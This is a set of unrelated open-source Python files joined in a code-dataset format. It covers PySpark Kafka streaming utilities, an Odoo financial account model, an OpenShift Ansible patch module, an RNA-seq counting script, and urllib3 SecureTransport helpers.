self._timer_service.register_event_time_timer(self.window, time)
def delete_processing_time_timer(self, time: int):
self._timer_service.delete_processing_time_timer(self.window, time)
def delete_event_time_timer(self, time: int):
self._timer_service.delete_event_time_timer(self.window, time)
def clear(self):
self._trigger.clear(self.window)
def get_partitioned_state(self, state_descriptor: StateDescriptor) -> State:
if isinstance(state_descriptor, ValueStateDescriptor):
state = self._state_backend.get_value_state(state_descriptor.name, PickleCoder())
elif isinstance(state_descriptor, ListStateDescriptor):
state = self._state_backend.get_list_state(state_descriptor.name, PickleCoder())
elif isinstance(state_descriptor, MapStateDescriptor):
state = self._state_backend.get_map_state(
state_descriptor.name, PickleCoder(), PickleCoder())
else:
raise Exception("Unknown supported StateDescriptor %s" % state_descriptor)
state.set_current_namespace(self.window)
return state
def merge_partitioned_state(self, state_descriptor: StateDescriptor):
if not self.merged_windows:
state = self.get_partitioned_state(state_descriptor)
if isinstance(state, InternalMergingState):
state.merge_namespaces(self.window, self.merged_windows)
else:
raise Exception("The given state descriptor does not refer to a mergeable state"
" (MergingState)")
|
dbergan/AutobahnPython | refs/heads/master | examples/twisted/wamp/basic/rpc/decorators/__init__.py | 561 | ###############################################################################
##
## Copyright (C) 2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
|
poffuomo/spark | refs/heads/master | python/pyspark/streaming/kafka.py | 36 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from py4j.protocol import Py4JJavaError
from pyspark.rdd import RDD
from pyspark.storagelevel import StorageLevel
from pyspark.serializers import AutoBatchedSerializer, PickleSerializer, PairDeserializer, \
NoOpSerializer
from pyspark.streaming import DStream
from pyspark.streaming.dstream import TransformedDStream
from pyspark.streaming.util import TransformFunction
__all__ = ['Broker', 'KafkaMessageAndMetadata', 'KafkaUtils', 'OffsetRange',
'TopicAndPartition', 'utf8_decoder']
def utf8_decoder(s):
""" Decode the unicode as UTF-8 """
if s is None:
return None
return s.decode('utf-8')
class KafkaUtils(object):
@staticmethod
def createStream(ssc, zkQuorum, groupId, topics, kafkaParams=None,
storageLevel=StorageLevel.MEMORY_AND_DISK_2,
keyDecoder=utf8_decoder, valueDecoder=utf8_decoder):
"""
Create an input stream that pulls messages from a Kafka Broker.
:param ssc: StreamingContext object
:param zkQuorum: Zookeeper quorum (hostname:port,hostname:port,..).
:param groupId: The group id for this consumer.
:param topics: Dict of (topic_name -> numPartitions) to consume.
Each partition is consumed in its own thread.
:param kafkaParams: Additional params for Kafka
:param storageLevel: RDD storage level.
:param keyDecoder: A function used to decode key (default is utf8_decoder)
:param valueDecoder: A function used to decode value (default is utf8_decoder)
:return: A DStream object
"""
if kafkaParams is None:
kafkaParams = dict()
kafkaParams.update({
"zookeeper.connect": zkQuorum,
"group.id": groupId,
"zookeeper.connection.timeout.ms": "10000",
})
if not isinstance(topics, dict):
raise TypeError("topics should be dict")
jlevel = ssc._sc._getJavaStorageLevel(storageLevel)
helper = KafkaUtils._get_helper(ssc._sc)
jstream = helper.createStream(ssc._jssc, kafkaParams, topics, jlevel)
ser = PairDeserializer(NoOpSerializer(), NoOpSerializer())
stream = DStream(jstream, ssc, ser)
return stream.map(lambda k_v: (keyDecoder(k_v[0]), valueDecoder(k_v[1])))
@staticmethod
def createDirectStream(ssc, topics, kafkaParams, fromOffsets=None,
keyDecoder=utf8_decoder, valueDecoder=utf8_decoder,
messageHandler=None):
"""
.. note:: Experimental
Create an input stream that directly pulls messages from a Kafka Broker and specific offset.
This is not a receiver based Kafka input stream, it directly pulls the message from Kafka
in each batch duration and processed without storing.
This does not use Zookeeper to store offsets. The consumed offsets are tracked
by the stream itself. For interoperability with Kafka monitoring tools that depend on
Zookeeper, you have to update Kafka/Zookeeper yourself from the streaming application.
You can access the offsets used in each batch from the generated RDDs (see
To recover from driver failures, you have to enable checkpointing in the StreamingContext.
The information on consumed offset can be recovered from the checkpoint.
See the programming guide for details (constraints, etc.).
:param ssc: StreamingContext object.
:param topics: list of topic_name to consume.
:param kafkaParams: Additional params for Kafka.
:param fromOffsets: Per-topic/partition Kafka offsets defining the (inclusive) starting
point of the stream.
:param keyDecoder: A function used to decode key (default is utf8_decoder).
:param valueDecoder: A function used to decode value (default is utf8_decoder).
:param messageHandler: A function used to convert KafkaMessageAndMetadata. You can assess
meta using messageHandler (default is None).
:return: A DStream object
"""
if fromOffsets is None:
fromOffsets = dict()
if not isinstance(topics, list):
raise TypeError("topics should be list")
if not isinstance(kafkaParams, dict):
raise TypeError("kafkaParams should be dict")
def funcWithoutMessageHandler(k_v):
return (keyDecoder(k_v[0]), valueDecoder(k_v[1]))
def funcWithMessageHandler(m):
m._set_key_decoder(keyDecoder)
m._set_value_decoder(valueDecoder)
return messageHandler(m)
helper = KafkaUtils._get_helper(ssc._sc)
jfromOffsets = dict([(k._jTopicAndPartition(helper),
v) for (k, v) in fromOffsets.items()])
if messageHandler is None:
ser = PairDeserializer(NoOpSerializer(), NoOpSerializer())
func = funcWithoutMessageHandler
jstream = helper.createDirectStreamWithoutMessageHandler(
ssc._jssc, kafkaParams, set(topics), jfromOffsets)
else:
ser = AutoBatchedSerializer(PickleSerializer())
func = funcWithMessageHandler
jstream = helper.createDirectStreamWithMessageHandler(
ssc._jssc, kafkaParams, set(topics), jfromOffsets)
stream = DStream(jstream, ssc, ser).map(func)
return KafkaDStream(stream._jdstream, ssc, stream._jrdd_deserializer)
@staticmethod
def createRDD(sc, kafkaParams, offsetRanges, leaders=None,
keyDecoder=utf8_decoder, valueDecoder=utf8_decoder,
messageHandler=None):
"""
.. note:: Experimental
Create an RDD from Kafka using offset ranges for each topic and partition.
:param sc: SparkContext object
:param kafkaParams: Additional params for Kafka
:param offsetRanges: list of offsetRange to specify topic:partition:[start, end) to consume
:param leaders: Kafka brokers for each TopicAndPartition in offsetRanges. May be an empty
map, in which case leaders will be looked up on the driver.
:param keyDecoder: A function used to decode key (default is utf8_decoder)
:param valueDecoder: A function used to decode value (default is utf8_decoder)
:param messageHandler: A function used to convert KafkaMessageAndMetadata. You can assess
meta using messageHandler (default is None).
:return: An RDD object
"""
if leaders is None:
leaders = dict()
if not isinstance(kafkaParams, dict):
raise TypeError("kafkaParams should be dict")
if not isinstance(offsetRanges, list):
raise TypeError("offsetRanges should be list")
def funcWithoutMessageHandler(k_v):
return (keyDecoder(k_v[0]), valueDecoder(k_v[1]))
def funcWithMessageHandler(m):
m._set_key_decoder(keyDecoder)
m._set_value_decoder(valueDecoder)
return messageHandler(m)
helper = KafkaUtils._get_helper(sc)
joffsetRanges = [o._jOffsetRange(helper) for o in offsetRanges]
jleaders = dict([(k._jTopicAndPartition(helper),
v._jBroker(helper)) for (k, v) in leaders.items()])
if messageHandler is None:
jrdd = helper.createRDDWithoutMessageHandler(
sc._jsc, kafkaParams, joffsetRanges, jleaders)
ser = PairDeserializer(NoOpSerializer(), NoOpSerializer())
rdd = RDD(jrdd, sc, ser).map(funcWithoutMessageHandler)
else:
jrdd = helper.createRDDWithMessageHandler(
sc._jsc, kafkaParams, joffsetRanges, jleaders)
rdd = RDD(jrdd, sc).map(funcWithMessageHandler)
return KafkaRDD(rdd._jrdd, sc, rdd._jrdd_deserializer)
@staticmethod
def _get_helper(sc):
try:
return sc._jvm.org.apache.spark.streaming.kafka.KafkaUtilsPythonHelper()
except TypeError as e:
if str(e) == "'JavaPackage' object is not callable":
KafkaUtils._printErrorMsg(sc)
raise
@staticmethod
def _printErrorMsg(sc):
print("""
________________________________________________________________________________________________
Spark Streaming's Kafka libraries not found in class path. Try one of the following.
1. Include the Kafka library and its dependencies with in the
spark-submit command as
$ bin/spark-submit --packages org.apache.spark:spark-streaming-kafka-0-8:%s ...
2. Download the JAR of the artifact from Maven Central http://search.maven.org/,
Group Id = org.apache.spark, Artifact Id = spark-streaming-kafka-0-8-assembly, Version = %s.
Then, include the jar in the spark-submit command as
$ bin/spark-submit --jars <spark-streaming-kafka-0-8-assembly.jar> ...
________________________________________________________________________________________________
""" % (sc.version, sc.version))
class OffsetRange(object):
"""
Represents a range of offsets from a single Kafka TopicAndPartition.
"""
def __init__(self, topic, partition, fromOffset, untilOffset):
"""
Create an OffsetRange to represent range of offsets
:param topic: Kafka topic name.
:param partition: Kafka partition id.
:param fromOffset: Inclusive starting offset.
:param untilOffset: Exclusive ending offset.
"""
self.topic = topic
self.partition = partition
self.fromOffset = fromOffset
self.untilOffset = untilOffset
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self.topic == other.topic
and self.partition == other.partition
and self.fromOffset == other.fromOffset
and self.untilOffset == other.untilOffset)
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return "OffsetRange(topic: %s, partition: %d, range: [%d -> %d]" \
% (self.topic, self.partition, self.fromOffset, self.untilOffset)
def _jOffsetRange(self, helper):
return helper.createOffsetRange(self.topic, self.partition, self.fromOffset,
self.untilOffset)
class TopicAndPartition(object):
"""
Represents a specific topic and partition for Kafka.
"""
def __init__(self, topic, partition):
"""
Create a Python TopicAndPartition to map to the Java related object
:param topic: Kafka topic name.
:param partition: Kafka partition id.
"""
self._topic = topic
self._partition = partition
def _jTopicAndPartition(self, helper):
return helper.createTopicAndPartition(self._topic, self._partition)
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self._topic == other._topic
and self._partition == other._partition)
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return (self._topic, self._partition).__hash__()
class Broker(object):
"""
Represent the host and port info for a Kafka broker.
"""
def __init__(self, host, port):
"""
Create a Python Broker to map to the Java related object.
:param host: Broker's hostname.
:param port: Broker's port.
"""
self._host = host
self._port = port
def _jBroker(self, helper):
return helper.createBroker(self._host, self._port)
class KafkaRDD(RDD):
"""
A Python wrapper of KafkaRDD, to provide additional information on normal RDD.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer):
RDD.__init__(self, jrdd, ctx, jrdd_deserializer)
def offsetRanges(self):
"""
Get the OffsetRange of specific KafkaRDD.
:return: A list of OffsetRange
"""
helper = KafkaUtils._get_helper(self.ctx)
joffsetRanges = helper.offsetRangesOfKafkaRDD(self._jrdd.rdd())
ranges = [OffsetRange(o.topic(), o.partition(), o.fromOffset(), o.untilOffset())
for o in joffsetRanges]
return ranges
class KafkaDStream(DStream):
"""
A Python wrapper of KafkaDStream
"""
def __init__(self, jdstream, ssc, jrdd_deserializer):
DStream.__init__(self, jdstream, ssc, jrdd_deserializer)
def foreachRDD(self, func):
"""
Apply a function to each RDD in this DStream.
"""
if func.__code__.co_argcount == 1:
old_func = func
func = lambda r, rdd: old_func(rdd)
jfunc = TransformFunction(self._sc, func, self._jrdd_deserializer) \
.rdd_wrapper(lambda jrdd, ctx, ser: KafkaRDD(jrdd, ctx, ser))
api = self._ssc._jvm.PythonDStream
api.callForeachRDD(self._jdstream, jfunc)
def transform(self, func):
"""
Return a new DStream in which each RDD is generated by applying a function
on each RDD of this DStream.
`func` can have one argument of `rdd`, or have two arguments of
(`time`, `rdd`)
"""
if func.__code__.co_argcount == 1:
oldfunc = func
func = lambda t, rdd: oldfunc(rdd)
assert func.__code__.co_argcount == 2, "func should take one or two arguments"
return KafkaTransformedDStream(self, func)
class KafkaTransformedDStream(TransformedDStream):
"""
Kafka specific wrapper of TransformedDStream to transform on Kafka RDD.
"""
def __init__(self, prev, func):
TransformedDStream.__init__(self, prev, func)
@property
def _jdstream(self):
if self._jdstream_val is not None:
return self._jdstream_val
jfunc = TransformFunction(self._sc, self.func, self.prev._jrdd_deserializer) \
.rdd_wrapper(lambda jrdd, ctx, ser: KafkaRDD(jrdd, ctx, ser))
dstream = self._sc._jvm.PythonTransformedDStream(self.prev._jdstream.dstream(), jfunc)
self._jdstream_val = dstream.asJavaDStream()
return self._jdstream_val
class KafkaMessageAndMetadata(object):
"""
Kafka message and metadata information. Including topic, partition, offset and message
"""
def __init__(self, topic, partition, offset, key, message):
"""
Python wrapper of Kafka MessageAndMetadata
:param topic: topic name of this Kafka message
:param partition: partition id of this Kafka message
:param offset: Offset of this Kafka message in the specific partition
:param key: key payload of this Kafka message, can be null if this Kafka message has no key
specified, the return data is undecoded bytearry.
:param message: actual message payload of this Kafka message, the return data is
undecoded bytearray.
"""
self.topic = topic
self.partition = partition
self.offset = offset
self._rawKey = key
self._rawMessage = message
self._keyDecoder = utf8_decoder
self._valueDecoder = utf8_decoder
def __str__(self):
return "KafkaMessageAndMetadata(topic: %s, partition: %d, offset: %d, key and message...)" \
% (self.topic, self.partition, self.offset)
def __repr__(self):
return self.__str__()
def __reduce__(self):
return (KafkaMessageAndMetadata,
(self.topic, self.partition, self.offset, self._rawKey, self._rawMessage))
def _set_key_decoder(self, decoder):
self._keyDecoder = decoder
def _set_value_decoder(self, decoder):
self._valueDecoder = decoder
@property
def key(self):
return self._keyDecoder(self._rawKey)
@property
def message(self):
return self._valueDecoder(self._rawMessage)
|
thinkopensolutions/l10n-brazil | refs/heads/10.0 | financial/models/financial_account.py | 2 | # -*- coding: utf-8 -*-
#
# Copyright 2017 KMEE INFORMATICA LTDA
# Aristides Caldeira <aristides.caldeira@kmee.com.br>
# License AGPL-3 or later (http://www.gnu.org/licenses/agpl)
#
from __future__ import division, print_function, unicode_literals
from odoo import api, fields, models
class FinancialAccount(models.Model):
_name = b'financial.account'
_description = 'Financial Account'
_parent_name = 'parent_id'
# _parent_store = True
# _parent_order = 'code, name'
_rec_name = 'complete_name'
_order = 'code, complete_name'
code = fields.Char(
string='Code',
size=20,
index=True,
required=True,
)
name = fields.Char(
string='Name',
size=60,
index=True,
required=True,
)
parent_id = fields.Many2one(
comodel_name='financial.account',
string='Parent account',
ondelete='restrict',
index=True,
)
parent_left = fields.Integer(
string='Left Parent',
index=True,
)
parent_right = fields.Integer(
string='Right Parent',
index=True,
)
child_ids = fields.One2many(
comodel_name='financial.account',
inverse_name='parent_id',
string='Child Accounts',
)
level = fields.Integer(
string='Level',
compute='_compute_account',
store=True,
index=True,
)
is_reduction = fields.Boolean(
string='Is reduction account?',
compute='_compute_account',
store=True,
)
sign = fields.Integer(
string='Sign',
compute='_compute_account',
store=True,
)
complete_name = fields.Char(
string='Account',
size=500,
compute='_compute_account',
store=True,
)
type = fields.Selection(
selection=[
('A', 'Analytic'),
('S', 'Sinthetic')
],
string='Type',
compute='_compute_account',
store=True,
index=True,
)
def _compute_level(self):
self.ensure_one()
level = 1
if self.parent_id:
level += self.parent_id._compute_level()
return level
def _compute_complete_name(self):
self.ensure_one()
name = self.name
if self.parent_id:
name = self.parent_id._compute_complete_name() + ' / ' + name
return name
@api.depends('parent_id', 'code', 'name', 'child_ids.parent_id')
def _compute_account(self):
for account in self:
account.level = account._compute_level()
if account.name and \
account.name.startswith('(-)') or \
account.name.startswith('( - )'):
account.is_reduction = True
account.sign = -1
else:
account.is_reduction = False
account.sign = 1
if len(account.child_ids) > 0:
account.type = 'S'
else:
account.type = 'A'
if account.code and account.name:
account.complete_name = account.code + ' - ' + \
account._compute_complete_name()
def recreate_financial_account_tree_analysis(self):
# from .financial_account_tree_analysis import \
# SQL_SELECT_ACCOUNT_TREE_ANALYSIS
SQL_RECREATE_FINANCIAL_ACCOUNT_TREE_ANALYSIS = '''
delete from financial_account_tree_analysis;
insert into financial_account_tree_analysis (id, child_account_id,
parent_account_id, level)
select row_number() over()
as id, child_account_id, parent_account_id, level
from financial_account_tree_analysis_view
order by child_account_id, parent_account_id;
'''
self.env.cr.execute(SQL_RECREATE_FINANCIAL_ACCOUNT_TREE_ANALYSIS)
@api.model
def create(self, vals):
res = super(FinancialAccount, self).create(vals)
self.recreate_financial_account_tree_analysis()
return res
@api.multi
def write(self, vals):
res = super(FinancialAccount, self).write(vals)
self.recreate_financial_account_tree_analysis()
return res
@api.multi
def unlink(self):
res = super(FinancialAccount, self).unlink()
self.recreate_financial_account_tree_analysis()
return res
|
blrm/openshift-tools | refs/heads/stg | openshift/installer/vendored/openshift-ansible-3.10.0-0.29.0/roles/openshift_logging/library/logging_patch.py | 40 | #!/usr/bin/python
""" Ansible module to help with creating context patch file with whitelisting for logging """
import difflib
import re
from ansible.module_utils.basic import AnsibleModule
DOCUMENTATION = '''
---
module: logging_patch
short_description: This will create a context patch file while giving ability
to whitelist some lines (excluding them from comparison)
description:
- "To create configmap patches for logging"
author:
- Eric Wolinetz ewolinet@redhat.com
'''
EXAMPLES = '''
- logging_patch:
original_file: "{{ tempdir }}/current.yml"
new_file: "{{ configmap_new_file }}"
whitelist: "{{ configmap_protected_lines | default([]) }}"
'''
def account_for_whitelist(current_file_contents, new_file_contents, white_list=None):
""" This method will remove lines that contain whitelist values from the content
of the file so that we aren't build a patch based on that line
Usage:
for current_file_contents:
index:
number_of_shards: 1
number_of_replicas: 0
unassigned.node_left.delayed_timeout: 2m
translog:
flush_threshold_size: 256mb
flush_threshold_period: 5m
and new_file_contents:
index:
number_of_shards: 2
number_of_replicas: 1
unassigned.node_left.delayed_timeout: 2m
translog:
flush_threshold_size: 256mb
flush_threshold_period: 5m
and white_list:
['number_of_shards', 'number_of_replicas']
We would end up with:
index:
number_of_shards: 2
number_of_replicas: 1
unassigned.node_left.delayed_timeout: 2m
translog:
flush_threshold_size: 256mb
flush_threshold_period: 5m
"""
for line in white_list:
regex_line = r".*" + re.escape(line) + r":.*\n"
new_file_line = re.search(regex_line, new_file_contents)
if new_file_line:
current_file_contents = re.sub(regex_line, new_file_line.group(0), current_file_contents)
else:
current_file_contents = re.sub(regex_line, "", current_file_contents)
return current_file_contents
def run_module():
""" The body of the module, we check if the variable name specified as the value
for the key is defined. If it is then we use that value as for the original key """
module = AnsibleModule(
argument_spec=dict(
original_file=dict(type='str', required=True),
new_file=dict(type='str', required=True),
whitelist=dict(required=False, type='list', default=[])
),
supports_check_mode=True
)
original_fh = open(module.params['original_file'], "r")
original_contents = original_fh.read()
original_fh.close()
new_fh = open(module.params['new_file'], "r")
new_contents = new_fh.read()
new_fh.close()
original_contents = account_for_whitelist(original_contents, new_contents, module.params['whitelist'])
uni_diff = difflib.unified_diff(new_contents.splitlines(),
original_contents.splitlines(),
lineterm='')
return module.exit_json(changed=False, # noqa: F405
raw_patch="\n".join(uni_diff))
def main():
""" main """
run_module()
if __name__ == '__main__':
main()
|
idbedead/RNA-sequence-tools | refs/heads/master | Count_Parsing/sort_htseq_count.py | 2 | import fnmatch
import os
import pandas as pd
import cPickle as pickle
import subprocess
import csv
'''This program takes accepted_hits.bam files from tophat and turns them into
counts and creates matrix file of cells/conditions and counts using htseq:
http://www-huber.embl.de/HTSeq/doc/overview.html
The files are sorted using samtools: http://www.htslib.org/
Paired end mates are fixed and RNA metrics collected using Picard tools:
http://broadinstitute.github.io/picard/
The 3' to 5' bias of each sample is collected as a matrix file for easy plotting.
'''
#list of file paths with mapped hits
pats = ['/Volumes/Seq_data/results_01272015', '/Volumes/Seq_data/results_spc2_n2']
#output path
path = '/Volumes/Seq_data'
#initialize dictonaries for collected output
fpkm_matrix_dict_g ={}
count_dict = {}
norm_read_dict = {}
picard_stats_dict = {}
#collect gene_list once since it the same between all samples
st = 1
gene_list = []
#loop through all files and sort, fix, count, collect metrics on each
for p in pats:
for root, dirnames, filenames in os.walk(p):
for filename in fnmatch.filter(filenames, 'accepted_hits.bam'):
#sort accepted_hits.bam using samtools
cname = root.split('/')[-1]
sort_out = os.path.join(root,cname+'_sorted')
sam_sort_calln = 'samtools sort -n '+os.path.join(root,filename)+' '+sort_out
sam_sort_call = 'samtools sort '+os.path.join(root,filename)+' '+sort_out
print sam_sort_call
#skip if file already exists
if not os.path.isfile(sort_out+'.bam'):
process = subprocess.Popen(sam_sort_call, stdout=subprocess.PIPE, shell=True)
out, err = process.communicate()
print(out)
else:
print sort_out+'.bam already exists'
pass
#run picard_fixmate to clean up paired end reads in accepted_hits.bam (sorted)
picard_fixmate_out = os.path.join(root,sort_out.strip('.bam')+'_FM.bam')
if not os.path.isfile(picard_fixmate_out):
picard_fixmate_call = 'java -Xmx3g -jar /Users/idriver/picard/dist/picard.jar FixMateInformation INPUT='+sort_out+'.bam OUTPUT='+picard_fixmate_out+' AS=true SORT_ORDER=coordinate'
print picard_fixmate_call
process = subprocess.Popen(picard_fixmate_call, stdout=subprocess.PIPE, shell=True)
out, err = process.communicate()
print(out)
else:
print picard_fixmate_out+' already exists'
#format htseq-count command to generate raw counts from sorted accepted hits
gf = '/Volumes/Seq_data/genes_E_RS.gtf'
hts_out = os.path.join(root,cname+'_htseqcount.txt')
htseq_count_call = 'htseq-count -f bam '+picard_fixmate_out+' '+gf+' > '+hts_out
print htseq_count_call
if not os.path.isfile(hts_out):
process = subprocess.Popen(htseq_count_call, stdout=subprocess.PIPE, shell=True)
out, err = process.communicate()
print(out)
else:
print('htseq-count already exists')
#run picard CollectRnaSeqMetrics (http://broadinstitute.github.io/picard/command-line-overview.html) and generate matrix of 3' to 5' bias (norm_read_dict)
picard_rnaseqmetric_out = os.path.join(root,sort_out.strip('sorted.bam')+'RNA_metric.txt')
picard_rnaseqchart_out = os.path.join(root,sort_out.strip('sorted.bam')+'RNA_metric.pdf')
picard_seqmetric_call = 'java -Xmx3g -jar /Users/idriver/picard/dist/picard.jar CollectRnaSeqMetrics REF_FLAT=/Volumes/Seq_data/refFlat_mm10ERS.txt.gz STRAND_SPECIFICITY=NONE MINIMUM_LENGTH=70 CHART_OUTPUT='+picard_rnaseqchart_out+' INPUT='+picard_fixmate_out+' OUTPUT='+picard_rnaseqmetric_out
print picard_seqmetric_call
if not os.path.isfile(picard_rnaseqchart_out):
process = subprocess.Popen(picard_seqmetric_call, stdout=subprocess.PIPE, shell=True)
out, err = process.communicate()
print(out)
else:
print('picard metric already exists')
g_counts = []
with open(hts_out, mode='r') as infile:
hts_tab = csv.reader(infile, delimiter = '\t')
print st
for l in hts_tab:
if st == 1:
gene_list.append(l[0])
g_counts.append(l[1])
st = 2
print len(g_counts)
print len(gene_list)
count_dict[cname] = g_counts
norm_read_dict[cname] = []
index3 = []
with open(picard_rnaseqmetric_out, mode='r') as infile:
pic_tab = csv.reader(infile, delimiter = '\t')
for i, l in enumerate(pic_tab):
if i == 6:
index1 = l
if i == 7:
num_stats = []
for n in l:
if n == '' or n == '?':
num_stats.append(0.0)
else:
num_stats.append(float(n))
picard_stats_dict[cname] = num_stats
if i == 10:
index2 = l
if i > 10 and i <= 111:
index3.append(int(l[0]))
norm_read_dict[cname].append(float(l[1]))
for k, v in norm_read_dict.items():
if len(v) == 0:
norm_read_dict[k] = [0 for x in range(101)]
print norm_read_dict[k], len(norm_read_dict[k])
print index3
#form pandas dataframe of each and save as tab delimited file
count_df = pd.DataFrame(count_dict, index = gene_list)
count_df.to_csv(os.path.join(path,'combined_spc_count_table.txt'), sep = '\t')
with open(os.path.join(path,'htseq_count_combined_spc.p'), 'wb') as fp1:
pickle.dump(count_df, fp1)
pic_stats_df = pd.DataFrame(picard_stats_dict, index = index1)
pic_stats_df.to_csv(os.path.join(path,'combined_spc_picard_stats.txt'), sep = '\t')
norm_read_df = pd.DataFrame(norm_read_dict, index = index3)
norm_read_df.to_csv(os.path.join(path,'combined_spc_read_bias.txt'), sep = '\t')
pd.DataFrame.plot(norm_read_df)
|
Dino0631/RedRain-Bot | refs/heads/develop | lib/urllib3/contrib/_securetransport/low_level.py | 136 | """
Low-level helpers for the SecureTransport bindings.
These are Python functions that are not directly related to the high-level APIs
but are necessary to get them to work. They include a whole bunch of low-level
CoreFoundation messing about and memory management. The concerns in this module
are almost entirely about trying to avoid memory leaks and providing
appropriate and useful assistance to the higher-level code.
"""
import base64
import ctypes
import itertools
import re
import os
import ssl
import tempfile
from .bindings import Security, CoreFoundation, CFConst
# This regular expression is used to grab PEM data out of a PEM bundle.
_PEM_CERTS_RE = re.compile(
b"-----BEGIN CERTIFICATE-----\n(.*?)\n-----END CERTIFICATE-----", re.DOTALL
)
def _cf_data_from_bytes(bytestring):
"""
Given a bytestring, create a CFData object from it. This CFData object must
be CFReleased by the caller.
"""
return CoreFoundation.CFDataCreate(
CoreFoundation.kCFAllocatorDefault, bytestring, len(bytestring)
)
def _cf_dictionary_from_tuples(tuples):
"""
Given a list of Python tuples, create an associated CFDictionary.
"""
dictionary_size = len(tuples)
# We need to get the dictionary keys and values out in the same order.
keys = (t[0] for t in tuples)
values = (t[1] for t in tuples)
cf_keys = (CoreFoundation.CFTypeRef * dictionary_size)(*keys)
cf_values = (CoreFoundation.CFTypeRef * dictionary_size)(*values)
return CoreFoundation.CFDictionaryCreate(
CoreFoundation.kCFAllocatorDefault,
cf_keys,
cf_values,
dictionary_size,
CoreFoundation.kCFTypeDictionaryKeyCallBacks,
CoreFoundation.kCFTypeDictionaryValueCallBacks,
)
def _cf_string_to_unicode(value):
"""
Creates a Unicode string from a CFString object. Used entirely for error
reporting.
Yes, it annoys me quite a lot that this function is this complex.
"""
value_as_void_p = ctypes.cast(value, ctypes.POINTER(ctypes.c_void_p))
string = CoreFoundation.CFStringGetCStringPtr(
value_as_void_p,
CFConst.kCFStringEncodingUTF8
)
if string is None:
buffer = ctypes.create_string_buffer(1024)
result = CoreFoundation.CFStringGetCString(
value_as_void_p,
buffer,
1024,
CFConst.kCFStringEncodingUTF8
)
if not result:
raise OSError('Error copying C string from CFStringRef')
string = buffer.value
if string is not None:
string = string.decode('utf-8')
return string
def _assert_no_error(error, exception_class=None):
"""
Checks the return code and throws an exception if there is an error to
report
"""
if error == 0:
return
cf_error_string = Security.SecCopyErrorMessageString(error, None)
output = _cf_string_to_unicode(cf_error_string)
CoreFoundation.CFRelease(cf_error_string)
if output is None or output == u'':
output = u'OSStatus %s' % error
if exception_class is None:
exception_class = ssl.SSLError
raise exception_class(output)
def _cert_array_from_pem(pem_bundle):
"""
Given a bundle of certs in PEM format, turns them into a CFArray of certs
that can be used to validate a cert chain.
"""
der_certs = [
base64.b64decode(match.group(1))
for match in _PEM_CERTS_RE.finditer(pem_bundle)
]
if not der_certs:
raise ssl.SSLError("No root certificates specified")
cert_array = CoreFoundation.CFArrayCreateMutable(
CoreFoundation.kCFAllocatorDefault,
0,
ctypes.byref(CoreFoundation.kCFTypeArrayCallBacks)
)
if not cert_array:
raise ssl.SSLError("Unable to allocate memory!")
try:
for der_bytes in der_certs:
certdata = _cf_data_from_bytes(der_bytes)
if not certdata:
raise ssl.SSLError("Unable to allocate memory!")
cert = Security.SecCertificateCreateWithData(
CoreFoundation.kCFAllocatorDefault, certdata
)
CoreFoundation.CFRelease(certdata)
if not cert:
raise ssl.SSLError("Unable to build cert object!")
CoreFoundation.CFArrayAppendValue(cert_array, cert)
CoreFoundation.CFRelease(cert)
except Exception:
# We need to free the array before the exception bubbles further.
# We only want to do that if an error occurs: otherwise, the caller
# should free.
CoreFoundation.CFRelease(cert_array)
return cert_array
def _is_cert(item):
"""
Returns True if a given CFTypeRef is a certificate.
"""
expected = Security.SecCertificateGetTypeID()
return CoreFoundation.CFGetTypeID(item) == expected
def _is_identity(item):
"""
Returns True if a given CFTypeRef is an identity.
"""
expected = Security.SecIdentityGetTypeID()
return CoreFoundation.CFGetTypeID(item) == expected
def _temporary_keychain():
"""
This function creates a temporary Mac keychain that we can use to work with
credentials. This keychain uses a one-time password and a temporary file to
store the data. We expect to have one keychain per socket. The returned
SecKeychainRef must be freed by the caller, including calling
SecKeychainDelete.
Returns a tuple of the SecKeychainRef and the path to the temporary
directory that contains it.
"""
# Unfortunately, SecKeychainCreate requires a path to a keychain. This
# means we cannot use mkstemp to use a generic temporary file. Instead,
# we're going to create a temporary directory and a filename to use there.
# This filename will be 8 random bytes expanded into base64. We also need
# some random bytes to password-protect the keychain we're creating, so we
# ask for 40 random bytes.
random_bytes = os.urandom(40)
filename = base64.b64encode(random_bytes[:8]).decode('utf-8')
password = base64.b64encode(random_bytes[8:]) # Must be valid UTF-8
tempdirectory = tempfile.mkdtemp()
keychain_path = os.path.join(tempdirectory, filename).encode('utf-8')
# We now want to create the keychain itself.
keychain = Security.SecKeychainRef()
status = Security.SecKeychainCreate(
keychain_path,
len(password),
password,
False,
None,
ctypes.byref(keychain)
)
_assert_no_error(status)
# Having created the keychain, we want to pass it off to the caller.
return keychain, tempdirectory
def _load_items_from_file(keychain, path):
"""
Given a single file, loads all the trust objects from it into arrays and
the keychain.
Returns a tuple of lists: the first list is a list of identities, the
second a list of certs.
"""
certificates = []
identities = []
result_array = None
with open(path, 'rb') as f:
raw_filedata = f.read()
try:
filedata = CoreFoundation.CFDataCreate(
CoreFoundation.kCFAllocatorDefault,
raw_filedata,
len(raw_filedata)
)
result_array = CoreFoundation.CFArrayRef()
result = Security.SecItemImport(
filedata, # cert data
None, # Filename, leaving it out for now
None, # What the type of the file is, we don't care
None, # what's in the file, we don't care
0, # import flags
None, # key params, can include passphrase in the future
keychain, # The keychain to insert into
ctypes.byref(result_array) # Results
)
_assert_no_error(result)
# A CFArray is not very useful to us as an intermediary
# representation, so we are going to extract the objects we want
